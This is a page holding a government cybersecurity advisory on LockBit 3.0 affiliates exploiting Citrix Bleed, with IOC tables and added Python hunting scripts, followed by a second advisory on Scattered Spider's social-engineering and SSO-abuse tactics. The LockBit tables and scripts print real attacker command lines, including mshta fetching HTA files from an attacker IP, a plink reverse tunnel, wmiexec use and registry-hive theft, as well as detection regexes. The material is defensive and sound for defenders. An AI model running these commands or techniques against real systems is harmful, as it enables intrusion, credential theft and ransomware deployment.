Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Multi-State Information Sharing & Analysis Center (MS-ISAC), and Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) are releasing this joint Cybersecurity Advisory (CSA) to disseminate IOCs, TTPs, and detection methods associated with LockBit 3.0 ransomware affiliates exploiting CVE-2023-4966, known as Citrix Bleed, which affects Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway appliances.
This CSA provides TTPs and IOCs obtained from FBI and ACSC investigations and voluntarily shared by Boeing. Boeing observed LockBit 3.0 affiliates exploiting CVE-2023-4966 to obtain initial access to Boeing Distribution Inc., its parts and distribution business, which maintains a separate environment. Other trusted third parties have observed similar activity impacting their organizations.
Historically, LockBit 3.0 affiliates have conducted attacks against organizations of varying sizes across multiple critical infrastructure sectors, including education, energy, financial services, food and agriculture, government and emergency services, healthcare, manufacturing, and transportation. The TTPs observed in LockBit ransomware attacks vary significantly from incident to incident.
Citrix Bleed, known to be leveraged by LockBit 3.0 affiliates, allows threat actors to bypass password requirements and multifactor authentication (MFA), leading to successful hijacking of legitimate user sessions on Citrix NetScaler ADC and Gateway appliances. Through the takeover of legitimate user sessions, malicious actors acquire elevated permissions to harvest credentials, move laterally, and access data and resources.
CISA and the authoring organizations strongly encourage network administrators to apply the mitigations found in this CSA, which include isolating NetScaler ADC and Gateway appliances and applying necessary software updates through the Citrix Knowledge Center.
The authoring organizations encourage network defenders to hunt for malicious activity on their networks using the detection methods and IOCs within this CSA. If a potential compromise is detected, organizations should apply the incident response recommendations. If no compromise is detected, organizations should immediately apply patches made publicly available.
For the associated Malware Analysis Report (MAR), see: MAR-10478915-1.v1 Citrix Bleed
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
CVE-2023-4966 is a software vulnerability found in Citrix NetScaler ADC and NetScaler Gateway appliances with exploitation activity identified as early as August 2023. This vulnerability provides threat actors, including LockBit 3.0 ransomware affiliates, the capability to bypass MFA [T1556.006] and hijack legitimate user sessions [T1563].
After acquiring access to valid cookies, LockBit 3.0 affiliates establish an authenticated session within the NetScaler appliance without a username, password, or access to MFA tokens [T1539]. Affiliates acquire this by sending an HTTP GET request with a crafted HTTP Host header, leading to a vulnerable appliance returning system memory information [T1082]. The information obtained through this exploit contains a valid NetScaler AAA session cookie.
Citrix publicly disclosed CVE-2023-4966 on Oct. 10, 2023, in a Citrix Security Bulletin that issued guidance and detailed the affected products, IOCs, and recommendations. Based on widely available public exploits and evidence of active exploitation, CISA added this vulnerability to the Known Exploited Vulnerabilities (KEV) Catalog. This critical vulnerability impacts the following software versions [1]:
Due to the ease of exploitation, CISA and the authoring organizations expect to see widespread exploitation of the Citrix vulnerability in unpatched software services throughout both private and public networks.
The malware identified in this campaign is staged by first executing a PowerShell script (123.ps1), which concatenates two base64 strings, converts them to bytes, and writes them to the designated file path.
$y = "TVqQAAMA...
The resulting file (adobelib.dll) is then executed by the PowerShell script using rundll32.
rundll32 C:\Users\Public\adobelib.dll,main
The Dynamic Link Library (DLL) will not execute correctly without the 104 hex character key. Following execution, the DLL attempts to send a POST request to https://adobe-us-updatefiles[.]digital/index.php which resolves to IP addresses 172.67.129[.]176 and 104.21.1[.]180 as of November 16, 2023. Although adobelib.dll and the adobe-us-updatefiles[.]digital have the appearance of legitimacy, the file and domain have no association with legitimate Adobe software and no identified interaction with the software.
Other observed activities include the use of a variety of TTPs commonly associated with ransomware activity. For example, LockBit 3.0 affiliates have been observed using AnyDesk and Splashtop remote monitoring and management (RMM) software, Batch and PowerShell scripts, the execution of HTA files using the Windows native utility mshta.exe, and other common software tools typically associated with ransomware incidents.
See Table 1–Table 5 for IOCs related to LockBit 3.0 affiliate exploitation of CVE-2023-4966.
Low confidence indicators may not be related to ransomware.
Indicator | Type | Fidelity | Description |
---|---|---|---|
192.229.221[.]95 | IP | Low |  |
123.ps1 | PowerShell script | High | Creates and executes payload via script. |
193.201.9[.]224 | IP | High | FTP to Russian geolocated IP from compromised system. |
62.233.50[.]25 | IP | High | Russian geolocated IP from compromised system. hxxp://62.233.50[.]25/en-us/docs.html, hxxp://62.233.50[.]25/en-us/test.html |
51.91.79[.]17 | IP | Med |  |
TeamViewer | Tool (Remote Admin) | Low |  |
70.37.82[.]20 | IP | Low | IP was seen from a known compromised account reaching out to an Atera IP address. LockBit is known to leverage Atera and similar remote admin tools such as AnyDesk and TeamViewer. |
185.17.40[.]178 | IP | Low | TeamViewer C2; Polish IP address that ties back to a Polish service provider, Artnet Sp. z o.o. |
Indicator | Type | Fidelity | Description |
---|---|---|---|
185.229.191[.]41 | AnyDesk usage | High | AnyDesk C2. |
81.19.135[.]219 | IP | High | Russian geolocated IP. hxxp://81.19.135[.]219/F8PtZ87fE8dJWqe.hta, hxxp://81.19.135[.]219:443/q0X5wzEh6P7.hta |
45.129.137[.]233 | IP | Medium | Callouts from known compromised device beginning during the compromise window. |
Plink.exe | Command interpreter | High | Plink (PuTTY Link) is a command-line connection tool, similar to UNIX SSH. It is mostly used for automated operations, such as making CVS access a repository on a remote server. Plink can be used to automate SSH actions and for remote SSH tunneling on Windows. |
AnyDeskMSI.exe | Remote admin tool | High | AnyDeskMSI.exe was installed as a service with "auto start" for persistence. The AnyDesk config file from the disk image could be used to recover the ID and connection IP, but it was not available. |
SRUtility.exe | Splashtop utility |  | SHA-256: 9b6b722ba4a691a2fe21747cd5b8a2d18811a173413d4934949047e04e40b30a |
Netscan.exe | Network scanning software | High | SHA-256: 498ba0afa5d3b390f852af66bd6e763945bf9b6bff2087015ed8612a18372155 |
Indicator | Type | Fidelity | Description |
---|---|---|---|
Scheduled task: MEGAMEGAcmd | Persistence | High |  |
Scheduled task: UpdateAdobeTask | Persistence | High |  |
Mag.dll | Persistence | High | Identified as running within UpdateAdobeTask. |
123.ps1 | Script | High | Creates |
Adobelib.dll | Persistence | Low | C2 from |
adobe-us-updatefiles[.]digital | Tool download | High | Used to download obfuscated toolsets. |
172.67.129[.]176 | Tool download | High | IP of adobe-us-updatefiles[.]digital. |
104.21.1[.]180 | Tool download | High | IP of adobe-us-updatefiles[.]digital. |
cmd.exe /q /c cd 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1 | Command | High | wmiexec.exe usage |
cmd.exe /q /c query user 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1 | Command | High | wmiexec.exe usage |
cmd.exe /q /c taskkill /f /im sqlwriter.exe /im winmysqladmin.exe /im w3sqlmgr.exe /im sqlwb.exe /im sqltob.exe /im sqlservr.exe /im sqlserver.exe /im sqlscan.exe /im sqlbrowser.exe /im sqlrep.exe /im sqlmangr.exe /im sqlexp3.exe /im sqlexp2.exe /im sqlex | Command | High | wmiexec.exe usage |
cmd.exe /q /c cd 1> \\127.0.0.1\admin$\__1698618133[.]54 2>&1 | Command | High | wmiexec.exe usage |
The authoring organizations recommend monitoring and reviewing traffic to the 81.19.135[.]* class C network and reviewing logs for mshta.exe being invoked with HTTP arguments [2].
Indicator | Type | Fidelity | Description | Notes |
---|---|---|---|---|
81.19.135[.]219 | IP | High | Russian geolocated IP used by user to request mshta with HTTP arguments to download a randomly named HTA file, q0X5wzzEh6P7.hta. |  |
81.19.135[.]220 | IP | High | Russian geolocated IP, seen outbound in logs. | IP registered to a South African company. |
81.19.135[.]226 | IP | High | Russian geolocated IP, seen outbound in logs. | IP registered to a South African company. |
Type | Indicator | Description |
---|---|---|
Filename | c:\users | Process Hacker |
Filename | c:\users | Process Hacker |
Filename | psexesvc.exe | PsExec service executable |
Filename | c:\perflogs\processhacker.exe | Process Hacker |
Filename | c:\windows\temp\screenconnect\23.8.5.8707\files\processhacker.exe | Process Hacker transferred via ScreenConnect |
Filename | c:\perflogs\lsass.dmp | LSASS dump |
Filename | c:\users | Mimikatz |
Filename | c:\users | ProcDump |
Filename | c:\users | Decrypt Veeam credentials |
Filename | secretsdump.py | Impacket installed on Azure VM |
Cmdline | secretsdump.py | Impacket installed on Azure VM |
Filename | ad.ps1 | ADRecon found in PowerShell transcripts |
Filename | c:\perflogs\64-bit\netscan.exe | SoftPerfect netscan |
Filename | tniwinagent.exe | Total Network Inventory agent |
Filename | psexec.exe | PsExec used to deploy ScreenConnect |
Filename | 7z.exe | Used to compress files |
Tool | Action1 | RMM |
Tool | Atera | RMM |
Tool | AnyDesk | RMM |
Tool | FixMe.IT | RMM |
Tool | ScreenConnect | RMM |
Tool | Splashtop | RMM |
Tool | Zoho Assist | RMM |
IPv4 | 101.97.36[.]61 | Zoho Assist |
IPv4 | 168.100.9[.]137 | SSH port forwarding infrastructure |
IPv4 | 185.20.209[.]127 | Zoho Assist |
IPv4 | 185.230.212[.]83 | Zoho Assist |
IPv4 | 206.188.197[.]22 | PowerShell reverse shell seen in PowerShell logging |
IPv4 | 54.84.248[.]205 | FixMe.IT IP |
IPv4 | 141.98.9[.]137 | Remote IP for Citrix Bleed exploitation |
Domain | assist.zoho[.]eu | Zoho Assist |
Filename | c:\perflogs\1.exe | ConnectWise renamed |
Filename | c:\perflogs\run.exe | ScreenConnect pushed by PsExec |
Filename | c:\perflogs\64-bit\m.exe | ConnectWise renamed |
Filename | c:\perflogs\64-bit\m0.exe | ConnectWise renamed |
Filename | c:\perflogs\za_access_my_department.exe | Zoho Remote Assist |
Filename | c:\users | Zoho Remote Assist |
Filename | c:\windows\servicehost.exe | plink renamed |
Filename | c:\windows\sysconf.bat | Runs the servicehost.exe (plink) command |
Filename | c:\windows\temp\screenconnect\23.8.5.8707\files\azure.msi | Zoho Remote Assist, transferred via ScreenConnect |
Cmdline | echo enter \| c:\windows\servicehost.exe -ssh -r 8085:127.0.0.1:8085 | plink port forwarding |
Domain | eu1-dms.zoho[.]eu | Zoho Assist |
Domain | fixme[.]it | FixMe.IT |
Domain | unattended.techinline[.]net | FixMe.IT |
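The command-line indicators in Tables 3 through 5 (Impacket wmiexec redirecting output to \\127.0.0.1\admin$, mshta.exe fetching an HTA over HTTP, rundll32 loading adobelib.dll from C:\Users\Public, the renamed plink reverse tunnel, the mass taskkill of SQL services) and the reg save hive theft described in the MAR section below all have shapes that can be matched against process-creation telemetry rather than as literal strings. The Python below is an added example for this page, not CISA's or any authoring organization's code. The sample command lines are constructed from the advisory's indicators with the [.] defanging removed, and the regular expressions are this editor's generalizations of those single samples (for example, any epoch-stamped ADMIN$ redirect, not just the two timestamps printed above).

```python
"""Hunt Windows process-creation command lines for the LockBit 3.0 /
Citrix Bleed TTPs listed in the advisory's IOC tables and MAR text.

Added example for this page, not CISA's code. Patterns are generalized from
the command lines the advisory prints (Impacket wmiexec output redirection,
mshta.exe fetching an HTA over HTTP, rundll32 loading a DLL from
C:\\Users\\Public, a renamed plink doing reverse SSH port forwarding,
reg save of the SAM/SYSTEM hives, mass taskkill of SQL processes).
The sample command lines at the bottom are constructed for the demo.
"""
import re
from typing import Iterable, List, Tuple

# Each rule: (name, compiled regex). Matching is case-insensitive because
# Windows paths and image names are case-insensitive.
RULES: List[Tuple[str, re.Pattern]] = [
    # Impacket wmiexec.py runs every command as:
    #   cmd.exe /q /c <cmd> 1> \\127.0.0.1\ADMIN$\__<epoch>.<frac> 2>&1
    ("impacket_wmiexec",
     re.compile(r"cmd\.exe\s+/q\s+/c\s+.*1>\s*\\\\127\.0\.0\.1\\admin\$\\__\d+\.\d+\s+2>&1", re.I)),
    # mshta.exe given a URL instead of a local .hta (Table 4 / reference [2]).
    ("mshta_remote_hta",
     re.compile(r"(^|\\|\s)mshta(\.exe)?\s+\S*https?://", re.I)),
    # rundll32 calling an export from a DLL dropped in a world-writable path.
    ("rundll32_public_dll",
     re.compile(r"rundll32(\.exe)?\s+.*\\(users\\public|perflogs|windows\\temp)\\[^\s,]+\.dll\s*,", re.I)),
    # plink-style reverse SSH tunnel: -ssh ... -r <lport>:<host>:<rport>.
    # The advisory's sample used a renamed binary (servicehost.exe), so match
    # on the argument shape rather than the image name.
    ("ssh_reverse_forward",
     re.compile(r"\s-ssh\b.*\s-r\s+\d{1,5}:[\w.\-]+:\d{1,5}", re.I)),
    # Credential-hive theft: reg save of SAM / SYSTEM / SECURITY (MAR a.bat).
    ("reg_save_hive",
     re.compile(r"\breg(\.exe)?\s+save\s+\W?hklm\\(sam|system|security)\b", re.I)),
]

# A taskkill naming several sql* images at once is the pre-encryption
# service-kill pattern from Table 3; handled as a count rather than a regex.
SQL_IMAGE = re.compile(r"/im\s+\S*sql\S*", re.I)
SQL_KILL_THRESHOLD = 3


def match_rules(cmdline: str) -> List[str]:
    """Return the names of every rule the command line triggers."""
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    if re.search(r"\btaskkill(\.exe)?\b", cmdline, re.I) and \
            len(SQL_IMAGE.findall(cmdline)) >= SQL_KILL_THRESHOLD:
        hits.append("taskkill_sql_services")
    return hits


def scan(cmdlines: Iterable[str]) -> List[Tuple[str, str]]:
    """Scan command lines; return (rule, cmdline) pairs for every hit."""
    out: List[Tuple[str, str]] = []
    for line in cmdlines:
        line = line.strip()
        if not line:
            continue
        for rule in match_rules(line):
            out.append((rule, line))
    return out


# Constructed sample process-creation command lines (not from a real host).
# The "[.]" defanging in the advisory's IOCs is removed so they look like
# what Sysmon Event ID 1 or Security Event ID 4688 would actually record.
SAMPLE_CMDLINES = [
    r"cmd.exe /q /c cd 1> \\127.0.0.1\admin$\__1698617793.44 2>&1",
    r"cmd.exe /q /c query user 1> \\127.0.0.1\admin$\__1698617793.44 2>&1",
    r"cmd.exe /q /c taskkill /f /im sqlwriter.exe /im sqlservr.exe /im sqlbrowser.exe /im sqlmangr.exe",
    r"C:\Windows\System32\mshta.exe http://81.19.135.219/q0X5wzEh6P7.hta",
    r"rundll32 C:\Users\Public\adobelib.dll,main",
    r"echo enter | c:\windows\servicehost.exe -ssh -r 8085:127.0.0.1:8085",
    r'reg save HKLM\SAM "C:\Windows\Tasks\am"',
    r"C:\Windows\System32\mshta.exe C:\Program Files\Vendor\help.hta",   # benign local HTA
    r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",      # benign
    r"cmd.exe /c dir C:\Users\Public",                                    # benign
]

if __name__ == "__main__":
    for rule, line in scan(SAMPLE_CMDLINES):
        print(f"{rule:24} {line}")
```

The wmiexec rule is the highest-value one: the `__<epoch>.<fraction>` share path is hard-coded in Impacket and survives any change of the command that follows `/c`, so it catches the lateral-movement tooling regardless of what the affiliate runs. Feed `scan()` the CommandLine field from your EDR or Sysmon export rather than matching the literal strings from the tables.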
See Table 6 and Table 7 for all referenced threat actor tactics and techniques in this advisory.
Technique Title | ID | Use |
---|---|---|
System Information Discovery | T1082 | Threat actors attempt to obtain information about the operating system and hardware, including versions and patches. |

Technique Title | ID | Use |
---|---|---|
Modify Authentication Process: Multifactor Authentication | T1556.006 | Threat actors leverage CVE-2023-4966 to compromise, modify, and/or bypass multifactor authentication to hijack user sessions, harvest credentials, and move laterally, which enables persistent access. |
Steal Web Session Cookie | T1539 | Threat actors with access to valid cookies can establish an authenticated session within the NetScaler appliance without a username, password, or access to multifactor authentication (MFA) tokens. |
Network defenders should prioritize observing users in session when hunting for network anomalies. This will aid the hunt for suspicious activity such as installing tools on the system (e.g., PuTTY, rclone), new account creation, log item failures, or running commands such as hostname, quser, whoami, net, and taskkill. Rotating credentials for identities provisioned for accessing resources via a vulnerable NetScaler ADC or Gateway appliance can also aid in detection.
For IP addresses:
Note: MFA to NetScaler will not operate as intended, because the attacker bypasses authentication by presenting the token/session of an already authenticated user.
The following procedures can help identify potential exploitation of CVE-2023-4966 and LockBit 3.0 activity:
- Search for the tf0gYx2YI file extension, which identifies LockBit encrypted files.
- Review the C:\Temp directory for the loading and execution of files.
Below are CISA-developed YARA rules and an open-source rule that may be used to detect malicious activity in the Citrix NetScaler ADC and Gateway software environment. For more information on detecting suspicious activity within NetScaler logs or additional resources, see CISA’s Malware Analysis Report (MAR) MAR-10478915-1.v1 Citrix Bleed or the Resources section of this CSA [3]:
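As an added example (not CISA's code), the hunt below walks a volume for the two file-system artifacts just listed: the tf0gYx2YI extension on encrypted files, and executable content staged in C:\Temp. It extends the staging check to the other drop directories the IOC tables name (PerfLogs and Users\Public). The sample tree is constructed in a temporary directory so the script runs offline; point `hunt()` at a mounted volume to use it for real.

```python
"""Hunt a directory tree for the file-system artifacts this advisory tells
defenders to look for: files carrying the LockBit 3.0 encrypted-file
extension tf0gYx2YI, and executable content staged in the drop directories
named in the IOC tables (C:\\Temp, C:\\PerfLogs, C:\\Users\\Public).

Added example for this page, not CISA's code. The sample tree is constructed
in a temporary directory; point hunt() at a real mounted volume to use it.
"""
import os
import tempfile
from pathlib import Path
from typing import Dict, List

LOCKBIT_EXT = ".tf0gYx2YI"                              # from the advisory's hunt guidance
STAGING_DIRS = ("temp", "perflogs", "users\\public")     # drop paths seen in the IOC tables
EXEC_EXTS = {".exe", ".dll", ".bat", ".ps1", ".hta", ".msi", ".py"}


def hunt(root: str) -> Dict[str, List[str]]:
    """Walk root; return encrypted files and executables found in staging dirs."""
    root_path = Path(root)
    encrypted: List[str] = []
    staged: List[str] = []
    for dirpath, _dirs, files in os.walk(root_path):
        # Normalise to a lower-case, backslash-separated path relative to root so
        # the same check works on a mounted image under Linux or on Windows.
        rel_dir = os.path.relpath(dirpath, root_path).lower().replace("/", "\\")
        in_staging = any(rel_dir == d or rel_dir.startswith(d + "\\") for d in STAGING_DIRS)
        for name in files:
            full = os.path.join(dirpath, name)
            if name.endswith(LOCKBIT_EXT):          # the extension is an exact marker
                encrypted.append(full)
            elif in_staging and Path(name).suffix.lower() in EXEC_EXTS:
                staged.append(full)
    return {"encrypted": sorted(encrypted), "staged_executables": sorted(staged)}


def build_sample_tree(base: str) -> None:
    """Constructed sample: one encrypted document plus staged tooling."""
    layout = {
        "Users/alice/Documents/q3-report.docx.tf0gYx2YI": b"\x00" * 16,
        "Users/alice/Documents/notes.txt": b"plain",
        "Temp/adobelib.dll": b"MZ" + b"\x00" * 14,
        "Temp/123.ps1": b"$y = ...",
        "PerfLogs/64-bit/netscan.exe": b"MZ",
        "Windows/System32/shell32.dll": b"MZ",      # not a staging dir; must not be flagged
    }
    for rel, data in layout.items():
        p = Path(base, *rel.split("/"))
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(data)


def demo() -> Dict[str, List[str]]:
    """Build the sample tree, hunt it, and return paths relative to the root."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return {k: [os.path.relpath(f, tmp) for f in v] for k, v in hunt(tmp).items()}


if __name__ == "__main__":
    for kind, files in demo().items():
        print(kind)
        for f in files:
            print("  ", f)
```

The staged-executable list is noisy on a busy server, so triage it by hash against the SHA-256 values in Table 2 and by the filenames in Table 5 (netscan.exe, 1.exe, m.exe, servicehost.exe) before escalating.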
CISA received four files for analysis that show files being used to save registry hives, dump the Local Security Authority Subsystem Service (LSASS) process memory to disk, and attempt to establish sessions via Windows Remote Management (WinRM). The files include:
rule CISA_10478915_01 : trojan installs_other_components
This file is a Windows batch file called a.bat that is used to execute the file called a.exe with the file called a.dll as an argument. The output is printed to a file named z.txt located in the path C:\Windows\Tasks. Next, a.bat pings the loopback internet protocol (IP) address 127.0.0[.]1 three times.
The next command it runs is reg save to save the HKLM\SYSTEM registry hive into the C:\Windows\Tasks\em directory. Again, a.bat pings the loopback address 127.0.0[.]1 one time before executing another reg save command that saves the HKLM\SAM registry hive into the C:\Windows\Tasks\am directory. Next, a.bat runs three makecab commands to create three cabinet (.cab) files from the previously mentioned saved registry hives and one file named C:\Users\Public\a.png. The names of the .cab files are as follows:
This file is a 64-bit Windows command-line executable called a.exe that is executed by a.bat. This file issues the remote procedure call (RPC) ncalrpc:[lsasspirpc] to the RPC endpoint to obtain a file path to the LSASS process on the infected machine. Once the file path is returned, the malware loads the accompanying DLL file called a.dll into the running LSASS process. If the DLL is correctly loaded, the malware outputs the message "[*]success" in the console.
This file is a 64-bit Windows DLL called a.dll that is passed by a.bat as a parameter to the file a.exe. The file a.exe loads this file into the running LSASS process on the infected machine. The file a.dll calls the Windows API CreateFileW to create a file called a.png in the path C:\Users\Public.
Next, a.dll loads DbgCore.dll, then uses the MiniDumpWriteDump function to dump LSASS process memory to disk. If successful, the dumped process memory is written to a.png. Once this is complete, a.bat uses the file a.png to create the cabinet file called a.cab in the path C:\Windows\Tasks.
This file is a Python script called a.py that attempts to leverage WinRM to establish a session. The script attempts to authenticate to the remote machine using NT LAN Manager (NTLM) if the keyword "hashpasswd" is present. If the keyword "hashpasswd" is not present, the script attempts to authenticate using basic authentication. Once a WinRM session is established with the remote machine, the script can execute command-line arguments on the remote machine. If no command is specified, a default command of "whoami" is run.
import "pe"
Organizations are encouraged to assess Citrix software and their systems for evidence of compromise, and to hunt for malicious activity (see the Additional Resources section). If compromise is suspected or detected, organizations should assume that threat actors hold full administrative access and can perform all tasks associated with the web management software, including installing malicious code.
If a potential compromise is detected, organizations should:
These mitigations apply to all critical infrastructure organizations and network defenders using Citrix NetScaler ADC and Gateway software. CISA and the authoring organizations recommend that software manufacturers incorporate secure-by-design and -default principles and tactics into their software development practices to limit the impact of exploitation, such as threat actors leveraging unpatched vulnerabilities in Citrix NetScaler appliances, and thereby strengthen the security posture of their customers.
For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.
The authoring organizations of this CSA recommend that organizations implement the mitigations below to improve their cybersecurity posture on the basis of the observed threat actor activity and to reduce the risk of compromise associated with CVE-2023-4966 and LockBit 3.0 ransomware affiliates. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA and the authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with LockBit 3.0 affiliates, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA do not encourage paying ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center at report@cisa.gov or (888) 282-0870.
Australian organizations that have been impacted or require assistance in regard to a ransomware incident can contact ASD’s ACSC via 1300 CYBER1 (1300 292 371), or by submitting a report to cyber.gov.au.
The information in this report is being provided “as is” for informational purposes only. CISA and authoring organizations do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and the authoring organizations.
Boeing contributed to this CSA.
[1] NetScaler ADC and NetScaler Gateway Security Bulletin for CVE-2023-4966
[2] What is Mshta, How Can it Be Used and How to Protect Against it (McAfee)
[3] Investigation of Session Hijacking via Citrix NetScaler ADC and Gateway Vulnerability (CVE-2023-4966)
November 21, 2023: Initial version.
The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) in response to recent activity by Scattered Spider threat actors against the commercial facilities sectors and subsectors. This advisory provides tactics, techniques, and procedures (TTPs) obtained through FBI investigations as recently as November 2023.
Scattered Spider is a cybercriminal group that targets large companies and their contracted information technology (IT) help desks. Scattered Spider threat actors, per trusted third parties, have typically engaged in data theft for extortion and have also been known to utilize BlackCat/ALPHV ransomware alongside their usual TTPs.
The FBI and CISA encourage critical infrastructure organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of a cyberattack by Scattered Spider actors.
Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 14. See the MITRE ATT&CK® Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Scattered Spider (also known as Starfraud, UNC3944, Scatter Swine, and Muddled Libra) engages in data extortion and several other criminal activities.[1] Scattered Spider threat actors are considered experts in social engineering and use multiple social engineering techniques, especially phishing, push bombing, and subscriber identity module (SIM) swap attacks, to obtain credentials, install remote access tools, and/or bypass multi-factor authentication (MFA). According to public reporting, Scattered Spider threat actors have [2],[3],[4]:
After gaining access to networks, the FBI observed Scattered Spider threat actors using publicly available, legitimate remote access and tunneling tools. Table 1 lists legitimate tools Scattered Spider has repurposed for criminal activity. Note: The use of these legitimate tools alone is not indicative of criminal activity. Users should review the Scattered Spider indicators of compromise (IOCs) and TTPs discussed in this CSA to determine whether they have been compromised.
Tool | Intended Use |
---|---|
Fleetdeck.io | Enables remote monitoring and management of systems. |
Level.io | Enables remote monitoring and management of systems. |
Mimikatz [S0002] | Extracts credentials from a system. |
Ngrok [S0508] | Enables remote access to a local web server by tunneling over the internet. |
Pulseway | Enables remote monitoring and management of systems. |
ScreenConnect | Enables remote connections to network devices for management. |
Splashtop | Enables remote connections to network devices for management. |
Tactical.RMM | Enables remote monitoring and management of systems. |
Tailscale | Provides virtual private networks (VPNs) to secure network communications. |
TeamViewer | Enables remote connections to network devices for management. |
In addition to using legitimate tools, Scattered Spider also uses malware as part of its TTPs. See Table 2 for some of the malware used by Scattered Spider.
Malware | Use |
---|---|
AveMaria (also known as WarZone [S0670]) | Enables remote access to a victim’s systems. |
Raccoon Stealer | Steals information including login credentials [TA0006], browser history [T1217], cookies [T1539], and other data. |
VIDAR Stealer | Steals information including login credentials, browser history, cookies, and other data. |
Scattered Spider threat actors have historically evaded detection on target networks by using living off the land techniques and allowlisted applications to navigate victim networks, as well as frequently modifying their TTPs.
Observably, Scattered Spider threat actors have exfiltrated data [TA0010] after gaining access and threatened to release it without deploying ransomware; this includes exfiltration to multiple sites including U.S.-based data centers and MEGA[.]NZ [T1567.002].
More recently, the FBI has identified Scattered Spider threat actors now encrypting victim files after exfiltration [T1486]. After exfiltrating and/or encrypting data, Scattered Spider threat actors communicate with victims via TOR, Tox, email, or encrypted applications.
Scattered Spider intrusions often begin with broad phishing [T1566] and smishing [T1660] attempts against a target using victim-specific crafted domains, such as the domains listed in Table 3 [T1583.001].
Domains |
---|
victimname-sso[.]com |
victimname-servicedesk[.]com |
victimname-okta[.]com |
In most instances, Scattered Spider threat actors conduct SIM swapping attacks against users that respond to the phishing/smishing attempt. The threat actors then work to identify the personally identifiable information (PII) of the most valuable users that succumbed to the phishing/smishing, obtaining answers for those users’ security questions. After identifying usernames, passwords, PII [T1589], and conducting SIM swaps, the threat actors then use social engineering techniques [T1656] to convince IT help desk personnel to reset passwords and/or MFA tokens [T1078.002],[T1199],[T1566.004] to perform account takeovers against the users in single sign-on (SSO) environments.
Scattered Spider threat actors then register their own MFA tokens [T1556.006],[T1606] after compromising a user’s account to establish persistence [TA0003]. Further, the threat actors add a federated identity provider to the victim’s SSO tenant and activate automatic account linking [T1484.002]. The threat actors are then able to sign into any account by using a matching SSO account attribute; because they already control the identity provider, they can choose an arbitrary value for that attribute. As a result, this activity allows the threat actors to escalate privileges [TA0004] and continue logging in even when passwords are changed [T1078]. Additionally, they leverage common endpoint detection and response (EDR) tools installed on victim networks, using the tools’ remote-shell capabilities to execute commands and elevate their access. They also deploy remote monitoring and management (RMM) tools [T1219] to maintain persistence.
Once persistence is established on a target network, Scattered Spider threat actors often perform discovery, specifically searching for SharePoint sites [T1213.002], credential storage documentation [T1552.001], VMware vCenter infrastructure [T1018], backups, and instructions for setting up/logging into Virtual Private Networks (VPN) [TA0007]. The threat actors enumerate the victim’s Active Directory (AD), perform discovery and exfiltration of victim’s code repositories [T1213.003], code-signing certificates [T1552.004], and source code [T1083],[TA0010]. Threat actors activate Amazon Web Services (AWS) Systems Manager Inventory [T1538] to discover targets for lateral movement [TA0007],[TA0008], then move to both preexisting [T1021.007] and actor-created [T1578.002] Amazon Elastic Compute Cloud (EC2) instances. In instances where the ultimate goal is data exfiltration, Scattered Spider threat actors use actor-installed extract, transform, and load (ETL) tools [T1648] to bring data from multiple data sources into a centralized database [T1074],[T1530]. According to trusted third parties, where more recent incidents are concerned, Scattered Spider threat actors may have deployed BlackCat/ALPHV ransomware onto victim networks—thereby encrypting VMware Elastic Sky X integrated (ESXi) servers [T1486].
